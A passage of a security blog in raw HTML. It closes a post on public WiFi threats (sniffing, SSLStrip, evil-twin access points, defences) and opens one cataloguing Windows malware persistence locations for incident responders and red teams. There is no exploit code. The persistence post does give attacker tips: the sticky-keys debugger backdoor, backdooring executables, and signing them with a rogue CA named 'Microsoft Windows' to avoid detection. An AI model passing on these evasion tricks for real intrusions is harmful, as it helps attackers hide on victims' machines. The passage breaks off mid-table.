Let’s discuss the different threats people face using public hotspots, compared to home/work internet usage:</div>
<div style="text-align: justify;">
1.<span class="Apple-tab-span" style="white-space: pre;"> </span>Where the website session data is not protected with SSL/TLS (and the cookie is not protected with secure flag), attackers on the same hotspot can obtain the session data and use it in session/login credentials stealing. Typical protocols affected:</div>
<div style="text-align: justify;">
<br /></div>
<ul>
<li style="text-align: justify;">HTTP sites</li>
<li style="text-align: justify;">HTTPS sites but unsecured cookie</li>
<li style="text-align: justify;">FTP without encryption</li>
<li style="text-align: justify;">IMAP/SMTP/POP3 without SSL/TLS or STARTTLS</li>
</ul>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
2.<span class="Apple-tab-span" style="white-space: pre;"> </span>Attackers can inject extra data into the HTTP traffic, which can be used for exploits, or social engineer attacks (e.g. update Flash player with our malware) – see the <a href="https://securelist.com/files/2014/11/darkhotel_kl_07.11.pdf" target="_blank">Dark Hotel campaign</a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
3.<span class="Apple-tab-span" style="white-space: pre;"> </span>Attackers can use tools like SSLStrip to keep the user’s traffic on clear text HTTP and steal password/session data/personal information</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
4.<span class="Apple-tab-span" style="white-space: pre;"> </span>Attackers can monitor and track user activity</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
5.<span class="Apple-tab-span" style="white-space: pre;"> </span>Attackers can directly attack the user’s machine (e.g. SMB service)</div>
<br />
<h3>
WPA2-PSK security</h3>
<br />
<div style="text-align: justify;">
So, why is a public WPA2-PSK WiFi safer than an open WiFi? Spoiler alert: it is not!</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In a generic public WPA2-PSK scenario, all users share the same password. And guess what, the whole traffic can be decrypted with the following information: SSID + shared password + information from the 4-way handshake. <a href="https://wiki.wireshark.org/HowToDecrypt802.11">https://wiki.wireshark.org/HowToDecrypt802.11</a></div>
<div style="text-align: justify;">
If you want to see it in action, here is a nice tutorial for you</div>
<div style="text-align: justify;">
<a href="http://www.lovemytool.com/blog/2010/05/wireshark-and-tshark-decrypt-sample-capture-file-by-joke-snelders.html">http://www.lovemytool.com/blog/2010/05/wireshark-and-tshark-decrypt-sample-capture-file-by-joke-snelders.html</a></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvZLXuIHz7kfYLZxUFhLlVcPLMbM7Ey2HfGitlUqlq_eErcpQ877PI7i1dPO1OLvnSn98b2j-PBFYAPB0GN9zHGXC08cQBAQqu99fudCOD8T5Pi5-RSapgHQCxyOUJ2S2DlVJdPepbf2J0/s1600/6a00e008d95770883401348056c1d8970c.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="290" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvZLXuIHz7kfYLZxUFhLlVcPLMbM7Ey2HfGitlUqlq_eErcpQ877PI7i1dPO1OLvnSn98b2j-PBFYAPB0GN9zHGXC08cQBAQqu99fudCOD8T5Pi5-RSapgHQCxyOUJ2S2DlVJdPepbf2J0/s400/6a00e008d95770883401348056c1d8970c.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Decrypted WPA2-PSK traffic</td></tr>
</tbody></table>
<br />
<div style="text-align: justify;">
Any user having access to the same WPA2-PSK network knows this information. So they can instantly decrypt your traffic. Or the attackers can just set up an access point with the same SSID, same password, and stronger signal. And now, the attacker can instantly launch active man-in-the-middle attacks. It is a common belief (even among ITSEC experts) that WPA2-PSK is not vulnerable to this attack. I am not sure why this vulnerability was left in the protocol, if you have the answer, let me know. Edit (2015-08-03): I think the key message here is that without server authentication (e.g. via PKI), it is not possible to solve this.</div>
<div style="text-align: justify;">
Let me link here one of my previous posts here with a great skiddie tool:</div>
<div style="text-align: justify;">
<a href="http://jumpespjump.blogspot.nl/2014/04/dsploit.html">http://jumpespjump.blogspot.nl/2014/04/dsploit.html</a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
To sum up, attackers on a WPA2-PSK network can:</div>
<div style="text-align: justify;">
<br /></div>
<ul>
<li style="text-align: justify;">Decrypt all HTTP/FTP/IMAP/SMTP/POP3 passwords or other sensitive information</li>
<li style="text-align: justify;">Can launch active attacks like SSLStrip, or modify HTTP traffic to include exploit/social engineer attacks</li>
<li style="text-align: justify;">Can monitor/track user activity</li>
</ul>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The only difference between open and WPA2-PSK networks is that an open network can be hacked with an attacker of the skill level of 1 from 10, while the WPA2-PSK network needs and an attacker with a skill level of 1.5. That is the difference.</div>
<br />
<h3>
The real solutions</h3>
<div>
<br /></div>
<br />
<div style="text-align: justify;">
1.<span class="Apple-tab-span" style="white-space: pre;"> </span>Website owners, service providers should deploy proper (trusted) SSL/TLS infrastructure, protect session cookies, etc. Whenever a user (or security professional) notices a problem with the quality of the service (e.g. missing SSL/TLS), the service provider has to be notified. If no change is made, it is recommended to drop the service provider and choose a more secure one. Users have to use HTTPS Everywhere plugin.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
2.<span class="Apple-tab-span" style="white-space: pre;"> </span>Protect the device against exploits by patching the software on it, use a secure browser (Chrome, IE11 + enhanced protection), disable unnecessary plugins (Java, Flash, Silverlight), or at least use it via click-to-play. Also, the use of exploit mitigations tools (EMET, HitmanPro Alert, Malwarebytes AntiExploit) and a good internet security suite is a good idea.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
3.<span class="Apple-tab-span" style="white-space: pre;"> </span>Website owners have to deploy <a href="https://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security" target="_blank">HSTS</a>, and optionally include their site in an <a href="https://hstspreload.appspot.com/" target="_blank">HSTS preload list</a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
4.<span class="Apple-tab-span" style="white-space: pre;"> </span>Don’t click blindly on fake downloads (like fake Flash Player updates)</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcW2mAw5SA142hXIFxIHwpdWLKAnGwgRMAM5b4oiz4gCxxECRQgaUTvvaqnx5pOmr2z5myD_RQFEapE8stS5oUM7_fLssQXoCp8JeMWBQKm63CyQnDXJ8ZjzMZdVTGfHJd12kSOGckXh9e/s1600/scandesk.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="286" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcW2mAw5SA142hXIFxIHwpdWLKAnGwgRMAM5b4oiz4gCxxECRQgaUTvvaqnx5pOmr2z5myD_RQFEapE8stS5oUM7_fLssQXoCp8JeMWBQKm63CyQnDXJ8ZjzMZdVTGfHJd12kSOGckXh9e/s400/scandesk.jpg" width="400" /></a></div>
<br />
<br />
<div style="text-align: justify;">
5.<span class="Apple-tab-span" style="white-space: pre;"> </span>The benefits of a VPN is usually overestimated. A VPN provider is just another provider, like the hotspot provider, or the ISP. They can do the same malicious stuff (traffic injecting, traffic monitoring, user tracking). Especially when people use free VPNs. And “Average Joe” will choose a free VPN. Also, VPN connections tend to be disconnected, and almost none of the VPN providers provide fail secure VPNs. Also, for the price of a good VPN service you can buy a good data plan and use 4G/3G instead of low-quality public hotspots. But besides this, on mobile OSes (Android, iOS, etc.) I strongly recommend the use of VPN, because it is not practically feasible to know for users which app is using SSL/TLS and which is not.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
6.<span class="Apple-tab-span" style="white-space: pre;"> </span>Use a location-aware firewall, and whenever the network is not trusted, set it to a Public.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlQ5S16qLVjAopmI6k_PCJ1xvFxTaH4OI2eYSU9SsFUM5jhH4R3gx39zcyV7o8lIQjdR0xqS4qHuHKomaq5n1GgYk-PN9Z3P4IvO1L5g3lAXNz5R3xz4jj69YJbzYbLKGTB31IciaySaNL/s1600/2251.clip_image001_627A00E5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="269" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlQ5S16qLVjAopmI6k_PCJ1xvFxTaH4OI2eYSU9SsFUM5jhH4R3gx39zcyV7o8lIQjdR0xqS4qHuHKomaq5n1GgYk-PN9Z3P4IvO1L5g3lAXNz5R3xz4jj69YJbzYbLKGTB31IciaySaNL/s320/2251.clip_image001_627A00E5.png" width="320" /></a></div>
<br />
<div style="text-align: justify;">
7.<span class="Apple-tab-span" style="white-space: pre;"> </span>In a small-business/home environment, buy a WiFi router with guest WiFi access possibility, where the different passwords can be set to guest networks than used for the other.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Asking the question “Are you using open WiFi?”, or “Do you do online banking on open WiFi?” are the wrong questions. The good questions are:</div>
<ul>
<li style="text-align: justify;">Do you trust the operator(s) of the network you are using?</li>
<li style="text-align: justify;">Are the clients separated?</li>
<li style="text-align: justify;">If clients are not separated, is it possible that there are people with malicious intent on the network?</li>
<li style="text-align: justify;">Are you security-aware, and are you following the rules previously mentioned? If you do follow these rules, those will protect you on whatever network you are.</li>
</ul>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
And call me an idiot, but I do online banking, e-shopping, and all the other sensitive stuff while I’m using open WiFi. And whenever I order pizza from an HTTP website, attackers can learn my address. Which is already in the phone book, on Facebook, and in every photo metadata I took with my smartphone about my cat and uploaded to the Internet (<a href="http://iknowwhereyourcatlives.com/">http://iknowwhereyourcatlives.com/</a>).</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0JNhkLWPeUvOfdUxiz98JGrLJxiy_iLcb-BBjpJRXQa0lAPZ4wPWNriwU-0isZ4GHKJl2uR_qSsq4hd36MPjixK7QAeBZyOu7zpLqdDFhnSmu8V6aV9mgXOTP5JANvVTJWilOBJD-sdpT/s1600/cat.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0JNhkLWPeUvOfdUxiz98JGrLJxiy_iLcb-BBjpJRXQa0lAPZ4wPWNriwU-0isZ4GHKJl2uR_qSsq4hd36MPjixK7QAeBZyOu7zpLqdDFhnSmu8V6aV9mgXOTP5JANvVTJWilOBJD-sdpT/s320/cat.png" width="320" /></a></div>
<br />
<br />
<div style="text-align: justify;">
Most articles and research publications are full of FUD about what people can learn from others. Maybe they are just outdated, maybe they are not. But it is totally safe to use Gmail on an open WiFi, no one will be able to read my e-mails.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
PS: I know “Average Joe” won’t find my blog post, won’t start to read it, won’t understand half I wrote. But even if they do, they won’t patch their browser plugins, pay for a VPN, or check the session cookie. So they are doomed to fail. That’s life. Deal with it.</div>
<div>
<br /></div>
Zhttp://www.blogger.com/profile/12373001166765443215noreply@blogger.com2tag:blogger.com,1999:blog-7429675726481888518.post-46401711323700151922015-05-05T08:32:00.000+02:002019-10-08T15:39:39.569+02:00Many ways of malware persistence (that you were always afraid to ask)<div style="text-align: justify;">
TL;DR: Are you into red teaming? Need persistence? This post is not that long, read it ;)</div>
<div style="text-align: justify;">
Are you into blue teaming? Have to find those pesky backdoors? This post is not that long, read it ;)</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In the <a href="http://jumpespjump.blogspot.com/2015/03/thousand-ways-to-backdoor-windows.html" target="_blank">previous post</a>, I listed different ways how a Windows domain/forest can be backdoored. In this new post, I am digging a bit deeper, and list the most common/known ways malware can survive a reboot, just using local resources of the infected Windows system. The list is far from complete, and I would like to encourage everyone to comment on new methods, not yet listed here. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
From an incident response point of view, one of the best strategies to find malware on a suspicious system is to search for suspicious entries that start with the system. In the good old days, you had to check for 2-3 locations to cover 99% of the infections. Nowadays, there are a thousand ways malware can start. The common ones automatically start whenever Windows starts (or the user logs in), but some tricky ones are triggered by other events.</div>
<div style="text-align: justify;">
<br /></div>
<div>
<h2 style="text-align: justify;">
Autoruns</h2>
<div>
<div style="text-align: justify;">
My favorite choice when it comes to malware persistence is Sysinternals tools, Autoruns. In this paragraph, I mainly quote the official built-in help, but bear with me, it is still interesting.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
On a side note, there are some problems with the Autoruns tool: it can only run on a live system. (EDIT: This is not true, Autoruns can analyze offline systems as well! Thanks to a comment from Justin.) And usually, this is not the case - I usually have dd images. And although VBoxManage can convert the dd images to VirtualBox disk image format, usually I don't have the time and storage to do that. This is where xmount awesomeness is here to rescue the day. It can convert dd and Encase images on-the-fly in-memory to Virtualbox format. Just attach the disk image to a new Virtualbox machine as the main boot HDD, modify the CPU/disk/controller settings until Windows starts instead of crashing, and voila, you can boot your forensic image - without modifying a single bit on the original evidence dd file. Another problem with malware analysis on a live system is that a good rootkit can fool the analyst easily. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
For quick wins, I usually filter out Microsoft entries, look for per-user locations only and check for unverified (missing or invalid Authenticode) executables. This usually helps to find 90% of malware easily. Especially if it has a color like purple or pink, it is highly suspicious. To find the rest, well, one has to dig deeper.</div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9taiP1e0q6Zq-HVqhGDUlfCctvKXwndbJ45fGDzW6DuyJ8xLLo3lbrOGW9hqqdKlaKxsKES2NqgEAyVdpQzjFhBEX8Jf3LGku_Dc2ixFPazcfmmx_Xk2kChGza6Xxp8HW7Q9j9FRSeAH4/s1600/zeus1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="148" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9taiP1e0q6Zq-HVqhGDUlfCctvKXwndbJ45fGDzW6DuyJ8xLLo3lbrOGW9hqqdKlaKxsKES2NqgEAyVdpQzjFhBEX8Jf3LGku_Dc2ixFPazcfmmx_Xk2kChGza6Xxp8HW7Q9j9FRSeAH4/s1600/zeus1.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Zeus "hiding" in the usual random directory - check the faked timestamp</td></tr>
</tbody></table>
<div style="text-align: justify;">
To implement "poor-mans monitoring", regularly save the output of Autoruns, and during incident response, it will be highly valuable. Howto guide <a href="http://www.sans.org/reading-room/whitepapers/malicious/utilizing-autoruns-catch-malware-33383" target="_blank">here</a>.<br />
<br /></div>
</div>
<h3>
</h3>
<h3>
</h3>
<h3 style="text-align: justify;">
Logon</h3>
<div>
<div style="text-align: justify;">
"This entry results in scans of standard autostart locations such as the Startup
folder for the current user and all users, the Run Registry keys, and standard
application launch locations." </div>
</div>
<div>
<div style="text-align: justify;">
There are 42 registry keys/folders at the moment in Autoruns, which can be used to autostart a malware. The most common ways are the HKCU\Software\Microsoft\Windows\CurrentVersion\Run and the C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup folder.</div>
<div style="text-align: justify;">
One of my favorite regarding this topic is the <a href="https://blog.gdatasoftware.com/blog/article/poweliks-the-persistent-malware-without-a-file.html" target="_blank">file-less Poweliks malware</a>, 100% pure awesomeness. Typical ring 3 code execution.<br />
<br /></div>
</div>
<h3>
</h3>
<h3>
</h3>
<h3 style="text-align: justify;">
</h3>
<h3 style="text-align: justify;">
Explorer</h3>
<div>
<div style="text-align: justify;">
"Select this entry to see Explorer shell extensions, browser helper objects, explorer toolbars, active setup executions, and shell execute hooks". 71 registry keys, OMG. Usually, this is not about auto-malware execution, but some of them might be a good place to hide malware.<br />
<br /></div>
</div>
<h3>
</h3>
<h3>
</h3>
<h3 style="text-align: justify;">
</h3>
<h3 style="text-align: justify;">
Internet explorer</h3>
<div>
<div style="text-align: justify;">
"This entry shows Browser Helper Objects (BHO's), Internet Explorer toolbars and extensions". 13 registry key here. If a malicious BHO is installed into your browser, you are pretty much screwed.</div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><img align="middle" border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBf0Uw_Z0AfDEs7rEXGgI3bsjoaL5KFYQlwyZ3FYBWRU-kkYIvcmEEjcRsoeEuGpYEMorFrCJu7l_ozQb_MFsPZHV2yFn81rQwMPqTfFcHhbOeS5zK5ZV-fw2G5kqA0haIMFF-SrcCSnap/s1600/IE_pwn3d.jpg" width="400" /></td></tr>
</tbody></table>
<div style="text-align: justify;">
<br /></div>
</div>
<h3>
</h3>
<h3>
</h3>
<h3 style="text-align: justify;">
</h3>
<h3 style="text-align: justify;">
Scheduled tasks</h3>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div>
<div style="text-align: justify;">
"Task scheduler tasks configured to start at boot or logon." Not commonly used, but it is important to look at this.</div>
<div style="text-align: justify;">
I always thought this part of the autostart entries is quite boring, but nowadays, I think it is one of the best ways to hide your malware. There are so many entries here by default, and some of them can use quite good tricks to trigger the start.</div>
<div style="text-align: justify;">
Did you know that you can create custom events that <a href="http://blakhal0.blogspot.com/2015/03/windows-event-log-driven-back-doors.html" target="_blank">trigger on Windows event logs</a>?</div>
<div style="text-align: justify;">
Did you know you can create <a href="http://0xthem.blogspot.com/2014/03/t-emporal-persistence-with-and-schtasks.html" target="_blank">malware persistence just by using Windows tools</a> like bitsadmin and Scheduled tasks?</div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqSPOBYm3OmDPWMe6W2pG-VeZepZuLuK05qtMlFvveWiOAQ3nW2v0LbCB0ofVoYhCeVZA1NB32MwGqUJwKkmDHRs2BJ7yZHWmbvBpactzxkMRuKAy9A0THluLMOKCXYiHoOc_ovvAxnYr0/s1600/sched2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="186" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqSPOBYm3OmDPWMe6W2pG-VeZepZuLuK05qtMlFvveWiOAQ3nW2v0LbCB0ofVoYhCeVZA1NB32MwGqUJwKkmDHRs2BJ7yZHWmbvBpactzxkMRuKAy9A0THluLMOKCXYiHoOc_ovvAxnYr0/s1600/sched2.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Scheduler in the old days</td></tr>
</tbody></table>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmX_zKgCWH8Dftdr9OmxgPiM9raTxj2U5eYq-1a5yRVJX0mUGqR5eDhOc01T5PmpFKUX7a4_FTMz1uvURpvbUVjMLi5F2uSR3j3iobKUg1u3Kewv6j-IDcvAvflLvQ-XXlv_NSqTq4S4P0/s1600/sched.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="212" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmX_zKgCWH8Dftdr9OmxgPiM9raTxj2U5eYq-1a5yRVJX0mUGqR5eDhOc01T5PmpFKUX7a4_FTMz1uvURpvbUVjMLi5F2uSR3j3iobKUg1u3Kewv6j-IDcvAvflLvQ-XXlv_NSqTq4S4P0/s1600/sched.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Scheduler in the new days</td></tr>
</tbody></table>
<div style="text-align: justify;">
<br /></div>
</div>
<h3>
</h3>
<h3>
</h3>
<h3 style="text-align: justify;">
Services</h3>
<div>
<div style="text-align: justify;">
HKLM\System\CurrentControlSet\Services<span class="Apple-tab-span" style="white-space: pre;"> </span>is a very commonplace to hide malware, especially rootkits. Check all entries with special care.<br />
<br /></div>
</div>
<h3>
</h3>
<h3>
</h3>
<h3 style="text-align: justify;">
</h3>
<h3 style="text-align: justify;">
Drivers</h3>
<div>
<div style="text-align: justify;">
Same as services. Very commonplace for rootkits. Unfortunately, signing a driver for 64-bit systems is not fun anymore, as it has to be signed by certificates that can be chained back to "<a href="https://msdn.microsoft.com/en-us/library/windows/hardware/dn170454(v=vs.85).aspx" target="_blank">Software Publisher Certificates</a>". Typical startup place for Ring 0 rootkits. </div>
<div style="text-align: justify;">
Starting from Windows 10, even this will change and all drivers have to be signed by "<a href="http://blogs.msdn.com/b/windows_hardware_certification/archive/2015/04/01/driver-signing-changes-in-windows-10.aspx" target="_blank">Windows Hardware Developer Center Dashboard portal</a>" and EV certificates.<br />
<br /></div>
</div>
<h3>
</h3>
<h3>
</h3>
<h3 style="text-align: justify;">
</h3>
<h3 style="text-align: justify;">
Codecs</h3>
<div>
<div style="text-align: justify;">
22 registry keys. Not very common, but possible code execution.<br />
<br /></div>
</div>
<h3>
</h3>
<h3>
</h3>
<h3 style="text-align: justify;">
</h3>
<h3 style="text-align: justify;">
Boot execute</h3>
<div style="text-align: justify;">
"Native images (as opposed to Windows images) that run early during the boot process."</div>
<div style="text-align: justify;">
5 registry keys here. Good place to hide a rootkit here.<br />
<br /></div>
<h3>
</h3>
<h3>
</h3>
<h3 style="text-align: justify;">
</h3>
<h3 style="text-align: justify;">
Image hijacks</h3>
<div style="text-align: justify;">
"Image file execution options and command prompt autostarts." 13 registry key here. I believe this was supposed for debugging purposes originally.</div>
<div style="text-align: justify;">
This is where the good-old sticky keys trick is hiding. It is a bit different from the others, as it provides a backdoor access, but you can only use this from the local network (usually). The trick is to execute your code whenever someone presses the SHIFT key multiple times before logging into RDP. The old way was to replace the sethc.exe, the new fun is to <a href="http://www.labofapenetrationtester.com/2012/05/fun-with-sticky-keys-utilman-and.html" target="_blank">set a debug program on sethc</a>. </div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEbhM_EWAItCibjzc09JWjT3RxaYpQFettrw2GlaV5uOY2DgimREgv7fnckeSiIsiKQkkdUEW7D8TLrMRhse-oI9E0evnxatAcYmIEc_o71BJSm6lKavppgqZKzYUdwo_OOmG2YdpCtji6/s1600/sethc.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="108" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEbhM_EWAItCibjzc09JWjT3RxaYpQFettrw2GlaV5uOY2DgimREgv7fnckeSiIsiKQkkdUEW7D8TLrMRhse-oI9E0evnxatAcYmIEc_o71BJSm6lKavppgqZKzYUdwo_OOmG2YdpCtji6/s1600/sethc.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">If you see this, you are in trouble</td></tr>
</tbody></table>
<div style="text-align: justify;">
<br /></div>
<h3>
</h3>
<h3>
</h3>
<h3 style="text-align: justify;">
AppInit</h3>
<div style="text-align: justify;">
"This has Autoruns shows DLLs registered as application initialization DLLs." Only 3 registry keys here. This is the good old way to inject a malicious DLL into Explorer, browsers, etc. Luckily it is going to be deprecated soon.<br />
<br /></div>
<h3>
</h3>
<h3>
</h3>
<h3 style="text-align: justify;">
</h3>
<h3 style="text-align: justify;">
Known DLLs</h3>
<div style="text-align: justify;">
"This reports the location of DLLs that Windows loads into applications that reference them." Only 1 registry key. This might be used to hijack some system DLLs.<br />
<br /></div>
<h3>
</h3>
<h3>
</h3>
<h3 style="text-align: justify;">
</h3>
<h3 style="text-align: justify;">
Winlogon</h3>
<div style="text-align: justify;">
"Shows DLLs that register for Winlogon notification of logon events." 7 registry keys. Sometimes used by malware.<br />
<br /></div>
<h3>
</h3>
<h3>
</h3>
<h3 style="text-align: justify;">
</h3>
<h3 style="text-align: justify;">
Winsock providers</h3>
<div style="text-align: justify;">
"Shows registered Winsock protocols, including Winsock service providers. Malware often installs itself as a Winsock service provider because there are few tools that can remove them. Autoruns can disable them, but cannot delete them." 4 registry keys. AFAIK this was trendy a while ago. But still, a good place to hide malware.<br />
<br /></div>
<h3>
</h3>
<h3>
</h3>
<h3 style="text-align: justify;">
</h3>
<h3 style="text-align: justify;">
Print monitors</h3>
<div>
<div style="text-align: justify;">
"Displays DLLs that load into the print spooling service. Malware has used this support to autostart itself." 1 registry key. Some malware writers are quite creative when it comes to hiding their persistence module.<br />
<br /></div>
</div>
<h3>
</h3>
<h3>
</h3>
<h3 style="text-align: justify;">
</h3>
<h3 style="text-align: justify;">
LSA providers</h3>
<div>
<div style="text-align: justify;">
"Shows registers Local Security Authority (LSA) authentication, notification and security packages." 5 registry keys. A good place to hide your password stealer. <br />
<br /></div>
</div>
<h3>
</h3>
<h3>
</h3>
<h3 style="text-align: justify;">
</h3>
<h3 style="text-align: justify;">
Network providers</h3>
<div>
<div style="text-align: justify;">
"Missing documentation". If you have a good 1 sentence documentation, please comment.<br />
<br /></div>
</div>
<h3>
</h3>
<h3>
</h3>
<h3 style="text-align: justify;">
</h3>
<h3 style="text-align: justify;">
WMI filters</h3>
<div>
<div style="text-align: justify;">
"Missing documentation". Check <a href="https://dl.mandiant.com/EE/library/MIRcon2014/MIRcon_2014_IR_Track_There's_Something_About_WMI.pdf" target="_blank">Mandiant </a>for details.<br />
<br /></div>
</div>
<h3>
</h3>
<h3>
</h3>
<h3 style="text-align: justify;">
</h3>
<h3 style="text-align: justify;">
Sidebar gadgets</h3>
<div>
<div style="text-align: justify;">
Thank god MS disabled this a while ago :)</div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgt_ebi9lZXVgCZRiSXRZR95nHkxKf3wgrR2GpiNZ2ld5IGSAryVrnD6mB8oe9cugw0_dhs8lqtjCfp746S97VKOHwqCe57f8mBu_JzTfmve0OP-ucX0Pju4CJQA0pbGfBfhKyjIpwmK1Nj/s1600/coolest-best-latest-new-fun-tech-gadgets-sidebar-gadgets-2.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgt_ebi9lZXVgCZRiSXRZR95nHkxKf3wgrR2GpiNZ2ld5IGSAryVrnD6mB8oe9cugw0_dhs8lqtjCfp746S97VKOHwqCe57f8mBu_JzTfmve0OP-ucX0Pju4CJQA0pbGfBfhKyjIpwmK1Nj/s1600/coolest-best-latest-new-fun-tech-gadgets-sidebar-gadgets-2.jpg" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">We all miss you, you crappy resource gobble nightmares</td></tr>
</tbody></table>
<div style="text-align: justify;">
<br /></div>
</div>
<h2>
</h2>
<h2>
</h2>
<h2 style="text-align: justify;">
Common ways - not in autoruns</h2>
<div>
<div style="text-align: justify;">
Now, let's see other possibilities to start your malware, which won't be listed in Sysinternals Autoruns.<br />
<br /></div>
<h3>
</h3>
<h3 style="text-align: justify;">
</h3>
<h3 style="text-align: justify;">
Backdoor an executable/DLL</h3>
</div>
<div>
<div style="text-align: justify;">
Just change the code of an executable which is either auto-starting or commonly started by the user. To avoid lame mistakes, disable the update of the file ... <a href="https://github.com/secretsquirrel/the-backdoor-factory" target="_blank">The backdoor factory</a> is a good source for this task. But if you backdoor an executable/DLL which is already in Autoruns listed, you will break the Digital Signature on the file. It is recommended to sign your executable, and if you can't afford to steal a trusted certificate, you can still import your own CA into the user's trusted certificate store (with user privileges), and it will look like a trusted one. Protip: Use "Microsoft Windows" as the codesigner CA, and your executable will blend in.</div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnmFzY3NVz-LF9C1GQNdGaiI1Lt_2Mcwkk_6m2xPNZC4yFmyOjU0n1nfW59LduSCnxU7X8IUvXVzumeUxpMT_mWvyPwB173GiPzK3skT9qmNARVkeSVSXzWIF23lQh8HejfzwN47yPZGfA/s1600/cert3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img align="middle" border="0" height="144" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnmFzY3NVz-LF9C1GQNdGaiI1Lt_2Mcwkk_6m2xPNZC4yFmyOjU0n1nfW59LduSCnxU7X8IUvXVzumeUxpMT_mWvyPwB173GiPzK3skT9qmNARVkeSVSXzWIF23lQh8HejfzwN47yPZGfA/s1600/cert3.png" width="320" /></a></td></tr>
<tr><td style="text-align: center;"></td></tr>
